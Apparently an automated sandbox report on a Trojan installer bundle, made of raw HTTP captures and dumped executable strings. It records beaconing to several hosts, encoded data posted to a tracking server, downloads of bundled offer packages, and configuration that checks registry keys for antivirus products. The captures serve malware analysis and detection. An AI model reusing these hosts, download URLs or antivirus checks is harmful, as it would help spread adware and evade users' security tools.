GET /client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnwKFUL9f89cCJZwGJddvEdZ 20=
x-amz-request-id: 3DEF045CAF143D99
Date: Tue, 08 Sep 2015 04:22:10 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>HTTP/1.1 200 OK..x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnwKFUL9f89cCJZwGJddvEdZ 20=..x-amz-request-id: 3DEF045CAF143D99..Date: Tue, 08 Sep 2015 04:22:10 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<html>..<body>..ok..</body>..</html>..
GET /client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4qE7KYQmQlDT04/u7p6p lnzU=
x-amz-request-id: D796A67BE3DB4F2A
Date: Tue, 08 Sep 2015 04:22:19 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>HTTP/1.1 200 OK..x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4qE7KYQmQlDT04/u7p6p lnzU=..x-amz-request-id: D796A67BE3DB4F2A..Date: Tue, 08 Sep 2015 04:22:19 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<html>..<body>..ok..</body>..</html>..
GET /amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s10100019.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 659
Connection: keep-alive
Date: Mon, 07 Sep 2015 17:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 17:27:48 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 39613
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGPIL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==
...........S[O.0.~.....hBY.B.[.0qyA..4..1r..5.vg;mY...qR....).}r..........`R.nLf.@...L.....bH.3.K.x..x_..K.$.e....Q....@cQ............BL.F....4...2$...|..h."..T..V./.Ku.Km.... #.`>...1...1.,.......=.......V..a..7..*@....d...2.&v.XR.Lz.........F....3..N.'1.Lb........i}/.......t.-..M...5.E..7?2...|..N.uU.F .Q..1..'........SG../......a..B......?..p....6.%.y....x.l".......|..H.3.....[K.1t....ZX...\Z.@..u........n.O..p.6......:.s.= ..m....".3.X...2.aoV.{.K. #..L.x..B.z...2"....K..4SN.....u..A..cu....O#...R...Y...........~z......x..*...... @.X.~bc<....i..#.~..J...R.0.|....\...........>....S.rY.<....<..8GQ{..PP._.I.....w....^lS9.u..Emf.G<.=M...h:....5L..w...HTTP/1.1 200 OK..Content-Type: application/javascript..Content-Length: 659..Connection: keep-alive..Date: Mon, 07 Sep 2015 17:27:48 GMT..Server: Apache..X-Powered-By: PHP/5.3.3..Cache-Control: max-age=86400..Expires: Tue, 08 Sep 2015 17:27:48 GMT..Content-Encoding: gzip..Vary: Accept-Encoding..Age: 39613..X-Cache: Hit from cloudfront..Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGPIL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==.............S[O.0.~.....hBY.B.[.0qyA..4..1r..5.vg;mY...qR....).}r..........`R.nLf.@...L.....bH.3.K.x..x_..K.$.e....Q....@cQ............BL.F....4...2$...|..h."..T..V./.Ku.Km.... #.`>...1...1.,.......=.......V..a..7..*@....d...2.&v.XR.Lz.........F....3..N.'1.Lb........i}/.......t.-..M...5.E..7?2...|..N.uU.F .Q..1..'........SG../......a..B......?..p....6.%.y....x.l".......|..H.3
<<< skipped >>>
POST /DSS_Unq_IMapplication_mon_remote.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 281
Connection: Keep-Alive
Cache-Control: no-cache
from=nsis&type=Reg&mode=checker&utid=194.242.96.218_2015-09-08_00:22:25&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ&DB=IE&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/419~NO~4/422~YES~0/432~NO~15/460~YES~0/575~NO~4/576~NO~4/
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 611
Connection: close
Content-Type: text/html; charset=UTF-8
422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..422#RE3|mystartsearchSoftware\mystartsearchhp#RCMD|-pub_id=314 -adv_id=76#SLP|30^6#PKG|NO#INT|Mntz_Installer.exe..12#RE2|Systweak\RegClean Pro\Version 6.1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXp://dl.ourinputinfonet.com/monti/llyun/hd/setup.exe#PKG|NO#INT|rcpsetup_17970.exe..
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 286
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFeIyNeouNP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/fHtWSk1NSk9RT0pMSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:08 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 388
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+IjFZxaUxLP4Z6h45WYoeNfoU5XIiLiYiLeo2CiId4eHhvZpB6i35FOWKHfEc/f39WP3yBVj+CflZPR0lHS1JJSUdOTkpLP4Z6fFZJSUlcS1JfXU5OWl0/fYyLVoeIh34/iYB9VoeIh34/e4J9Vkk/e46CfVZKSUk/j4ZWSz+QhI2GVkpNP3x7VkpNTUpPUU9KTEo=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:08 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:08 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;....
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 404
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFeHqLjHw/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT99jItWh4iHfj+JgH1Wh4iHfj97gn1WST97joJ9VkpJST+PhlZLP5CEjYZWSk0/fHtWSk1NSk9RT0pMUA==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:14 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 394
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFeH6HfT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSkxR&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:14 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:14 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;..
GET /os/rm/OfferScreen_422.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426709167"
Last-Modified: Wed, 18 Mar 2015 20:06:07 GMT
Cache-Control: max-age=32746
Content-Length: 7218
Content-Type: application/zip
X-HW: 1441686147.dop009.fr7.t,1441686146.cds009.fr7.c
PK........Q~.B...._...........inner.png.V.P.i..da.QP...h.......$.!$ G.`........4$...UP.Ee8,..%.(.............u5..."r8r8......).j_U.....wW.......V. ...~.4.f5.<yz..w...].b..f.X.@&.H ...s!.O...........#.H.0.-c3.$.,Bs.u..Q<b^.=...^,$..P.PLF.k....|2*...2..P..7E..R..y).<"....pW.4."H....8... .>..4..k....".%.~s.........h.#.K...3.t........b1 ..uq..$....._...&..HL...[....#...0..\..;.aI4.$...,...9j4...b.G.(.Z/0. )O"...a10..p.D...Z.A..`.N,.~I.&e..'.........-.1!..........I.D.OS......:..|....D.).'....E.X.G#.4_.|!.D.P..>T.......5..\])x...........aAgW"..s.r%.@..G.i>T".......A....X*..y..V....U,.*.82X...q......`i...PYx4....|X../..O!.0...H`..9.$.....q....?9.h...W.,\i:p~.{.o....H....f4>}...@.t..(...oB.......h3A.g.....o..i)L...1:m..s.I..e.['/.p..U~..n..X..qzYd{./...Z...^..>..\..>w....!.PY44...a?.;%x....%..........kU....y.B_a.( ....,T#*.M..2iLI..C.. .FX....c.%:.s....F.@..wN}.i.....lb..&.........uV_.m.J....S3U.N. ..Y>f6f.t.....F...d....tBf..z....t..E.......u....m_u...77.vI.jVEn.00.....Z<[2....OZj].....n.0.Q. ....H..8.L62.zJ.'...X..d.......>...T......(.X....i.|...>L*ub......l.o..qe.>f6........{'e....z..p.wM...'....d!.-J.fn.K8".WD...... .ld>Rrb..........K...gz.....5l......4}...e2Q~9,..!...2..K....}.W.._....eM...Et\...|S. .1#/..82rkH....n..O.\m.b.........g.t~E....gN...q.%...;'"..^4m.............w.e......38..V.L......^.u..j.e.......Cvi.......vq$k'.....S.N..op.9.WV<g.. wmS............b.z$.9.>.7.T.....u.>.....-.<ps......K.v. .<.H...F.F....w.9................G.%..u......w.{....LB..
<<< skipped >>>
GET /os/rm/OfferScreen_12_HD.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411022125"
Last-Modified: Thu, 18 Sep 2014 06:35:25 GMT
Cache-Control: max-age=32746
Content-Length: 10048
Content-Type: application/zip
X-HW: 1441686147.dop010.fr7.t,1441686146.cds037.fr7.c
PK.........l$Etbj.....=-......OfferScreen_12.html.:kS#7..C..A.......G.6P.0.....;x6...5%w.m............#...s..!.#...S...w..../.....v.....S.t...vN..w.w._?.?~`.......tR ^..g..... ...b..-vz.L....[.5...c..N.2.%..k.D.v^({.......?......\8... ~...Qr....u..R$,...%N..>...t.....ryw?a......e.......(.x5...8...;9).........Q..6i.$.W........8s........{..j.,..i.!.[...w.....`....&:[.;6.....Je.Wb..F.....`k..T.....<.....h.....f.j...`.W......n..q...,..g\t..kU....irm...,.I....y......BpsG.#.W.f..0..Bfn6...)oG3.$.;...C.{h.........(..-..A.p..Ay..f.(..`o{ow....D......`.N..L.y..](q.?-.....|.(J ..h....Iy......<...,U.=b..6 Ww....!.cV.2c...~.}...f..QI. ......U.F...\E.................Zdn^.....~...I...{d{.4..H...h.&...j..2..u....*..z...M.t..Rp....'..%b.......W...... <.[......4.88.......r..wmPr.....0...APy......;.l..=.u....3....R......z..#$R..._...(Ig".........e..._..*1js......v..(..l5.K...z@...w[..0m..a.....V.&......q.;.....xs`>.j.6..&.U.W...!L.!r.._1~...Z......HH..8....7....!...=e..P....g2....p...D...:B..^..$3..'.@....c.....q..f..l6)tz.by.5....{.m..]u.I.L({.t....Az...P..|....;1...{.f...g..J.^...p......M.....'....=... ....Q.'V...#.~.u ....YJ*(^.R...-...~......XP6..W.....gHx.]...`.5.......7.....#..A...d.~we1.......G... ..g."-....Q....P.n.."wOAb."C.. `g...r`t....i......q......^.>............. S.. !|..9D.6..r.}....n&-.. Y2{-KF....[...{......... ...g.ELH.!....pz&v......@........N~;...jP.....?........ZQ.;......;x.x.....{ C....vq'.7LfGI..}6c........J.......<...h5m.C.~..7)@c....8>......;.....L..%.. .).=o8....b&........-..h..
<<< skipped >>>
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 436
Connection: Keep-Alive
key=jZKJflZ6fI2Cj34/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/fYVWTD96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1P&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:23 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:23 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;..
GET /client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAnHIWIoOFtAfpn1TIXHaDs39jk=
x-amz-request-id: 5CA84AF807EBB1C3
Date: Tue, 08 Sep 2015 04:22:09 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>HTTP/1.1 200 OK..x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAnHIWIoOFtAfpn1TIXHaDs39jk=..x-amz-request-id: 5CA84AF807EBB1C3..Date: Tue, 08 Sep 2015 04:22:09 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<html>..<body>..ok..</body>..</html>..
POST /FCL_Co_Unq_remote_v5.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fcesneim.us
Content-Length: 107
Connection: Keep-Alive
Cache-Control: no-cache
from=nsis&type=Reg&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:25 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1870
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php..http://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php..UA..hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php..194.242.96.218_2015-09-08_00:22:25..NULL..12#RE2|Systweak\RegClean Pro\Version 6.1..419#O|V^0*S^0*E^0*EV1^0*T^0,B1|C*F*I,F1|Mail.Ru\MailRuUpdater.exe,F1|Amigo\Application\amigo.exe,RE2|Amigo,RR2|IM^330,RE3|Clients\StartMenuInternet\amigo.exe,RE3|Microsoft\MediaPlayer\ShimInclusionList\amigo.exe,RE3|Microsoft\Windows\CurrentVersion\App Paths\amigo.exe..422#D|2A^0,RE3|webssearchesSoftware\webssearcheshp,RE3|qone8Software\qone8hp,RE3|awesomehpSoftware\awesomehphp,RE3|aartemisSoftware\aartemishp,RE3|sweet-pageSoftware\sweet-pagehp,RE3|omiga-plusSoftware\omiga-plushp,RE3|vi-viewSoftware\vi-viewhp,RE3|istartsurfSoftware\istartsurfhp,RE3|mystartsearchSoftware\mystartsearchhp,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast..432#B1|F,RE3|SiteSee,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|ZoomWebLists..460#RE2|InstalledBrowserExtensions\32846,RE2|ESET,RE2|Malwarebytes' Anti-Malware,RE2|Malwarebytes,RE2|Avira,RE2|Fortinet\FortiClient,RE2|AVG,RE3|AVAST Software,RE3|AVAST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira..575#O|V^0*S^0*E^0*EV1^0*T^0,B1|I,ER|HKLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Softwa
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
taeako.exe_372:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
>%u0V
>%u0V
operator
operator
GetProcessWindowStation
GetProcessWindowStation
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
RegCreateKeyTransactedA
RegCreateKeyTransactedA
RegOpenKeyTransactedA
RegOpenKeyTransactedA
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
Advapi32.dll
Advapi32.dll
RegDeleteKeyExA
RegDeleteKeyExA
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegDeleteKeyA
RegDeleteKeyA
RegCloseKey
RegCloseKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe
7-787m7}7
7-787m7}7
6'676^6{6
6'676^6{6
:":(:2:=:
:":(:2:=:
2 2$2(2,2
2 2$2(2,2
combase.dll
combase.dll
mscoree.dll
mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
kernel32.dll
kernel32.dll
USER32.DLL
USER32.DLL
tae3ko.exe_1932:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
PSShE3@
PSShE3@
GetProcessWindowStation
GetProcessWindowStation
operator
operator
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyExW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCreateKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegDeleteKeyW
RegDeleteKeyW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
1*21272|2
1*21272|2
3.44484
3.44484
6#6,616>6
6#6,616>6
combase.dll
combase.dll
@mscoree.dll
@mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
kernel32.dll
kernel32.dll
USER32.DLL
USER32.DLL
Advapi32.dll
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe
dag17797.exe_552:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll
\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll
hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
ttp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
ttp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp
tware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
tware\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall,DBNI|OtherthanIEDefault,DBNC|OtherthanChromeDefault,RE2|Opera Software,RE3|Opera Software
\Windows\CurrentVersion\Uninstall\avast
\Windows\CurrentVersion\Uninstall\avast
Nullsoft Install System v11-Jul-2014.cvs
Nullsoft Install System v11-Jul-2014.cvs
GetProcessHeap
GetProcessHeap
OLEAUT32.dll
OLEAUT32.dll
WININET.dll
WININET.dll
MSVCRT.dll
MSVCRT.dll
nsWeb.dll
nsWeb.dll
6(7.767;7
6(7.767;7
4<.pd>
4<.pd>
%u X`i@
%u X`i@
_$,ZS.db
_$,ZS.db
o7.6.3
o7.6.3
0*%UP
0*%UP
q.ya!
q.ya!
nsd5.tmp
nsd5.tmp
2.html?
2.html?
/cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
/cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
